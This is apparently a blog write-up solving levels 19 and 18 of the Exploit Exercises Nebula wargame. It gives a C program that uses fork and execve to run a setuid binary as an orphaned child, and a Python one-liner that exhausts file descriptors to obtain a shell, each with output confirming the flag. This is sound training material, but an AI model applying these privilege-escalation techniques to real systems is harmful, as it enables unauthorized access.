Exploit Exercises Nebula — level19

This level is somewhat broken at exploit-exercises site. However, sharp reader can notice this.

After initial reading we can quickly conclude that fork() is the key to this challenge.

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main(int argc, char *argv[])
{
pid_t pid;

/* If you're curious why we have /bin/sh here, goto man execve */
char *arg[] = { "/bin/sh", "/tmp/pwn.sh", NULL };

pid = fork();
if(pid == 0)
execve("/home/flag19/flag19", arg, NULL);

return 0;
}

Which results in:

level19@nebula:/home/flag19$ /tmp/pawn
level19@nebula:/home/flag19$ You have successfully executed getflag on a target account

(Funny looking output due to forking().)

This and man execve should be sufficient to explain what’s going on here.

Exploit Exercises Nebula — level18

After initial reading I’ve found all three ways and went for jamming up file descriptors.

level18@nebula:/home/flag18$ python -c 'print "login\n"*1021 + "closelog\n" + "shell"' > /tmp/input
level18@nebula:/home/flag18$ cat /tmp/input | /home/flag18/flag18 --rcfile -d log
/home/flag18/flag18: invalid option -- '-'
/home/flag18/flag18: invalid option -- 'r'
/home/flag18/flag18: invalid option -- 'c'
/home/flag18/flag18: invalid option -- 'f'
/home/flag18/flag18: invalid option -- 'i'
/home/flag18/flag18: invalid option -- 'l'
/home/flag18/flag18: invalid option -- 'e'
You have successfully executed getflag on a target account

Oh, btw, strace is your friend.